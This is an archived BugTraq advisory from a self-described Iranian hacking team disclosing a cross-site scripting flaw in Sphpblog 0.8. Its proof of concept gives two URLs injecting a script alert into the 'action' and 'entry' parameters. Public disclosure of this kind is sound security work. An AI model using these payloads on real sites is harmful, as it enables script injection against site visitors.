BugTraq
Sphpblog => 0.8 Cross Site Scripting Nov 16 2006 08:47AM
the_3dit0r yahoo com
"""""""""""""""""""""""""""""""""""""""""""""""
""" :: :: ::::: :::: """
""" :: :: :: : :: """
""" :::: :: :: ::::: ::::: :::: """
""" :: :: ::: ::: :: :: :: :: :: """
""" :: :: :: : : ::::: :: :: :::: """
""" """
"""""""""""""""""""""""""""""""""""""""""""""""
Xmor$ DigitaL Hacking TeaM

# Sphpblog => 0.8 Cross Site Scripting
# Script.............. : Sphpblog
# Discovered by.... : the_Edit0r
# Location .......... : Iran
# Class.............. : Xss
# Original Advisory : http://Www.Xmors.com ( Pablic ) http://Www.Xmors.net (pirv8)
# We ArE : Scorpiunix , KAMY4r , Sh3ll , SilliCONIC , Zer0.C0d3r
# D3vil_B0y_ir , Tornado , DarkAngel , Behbood
# <Spical TNX Irania Hackers :
# ( Aria-Security , Crouz , virangar ,DeltaHacking , Iranhackers
# Kapa TeaM , Ashiyane , Shabgard , Simorgh-ev, Virangar )

# proof Of Concept :
# Www.Sitename.coM/[path]/add_block.php?action="><script>alert('Xmors')</s
cript><
# WWW.Sitename.com/[path]/index.php?entry="><script>alert('Xmors')</script
><

#Contact me : the_3dit0r[at]Yahoo[dot]coM

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus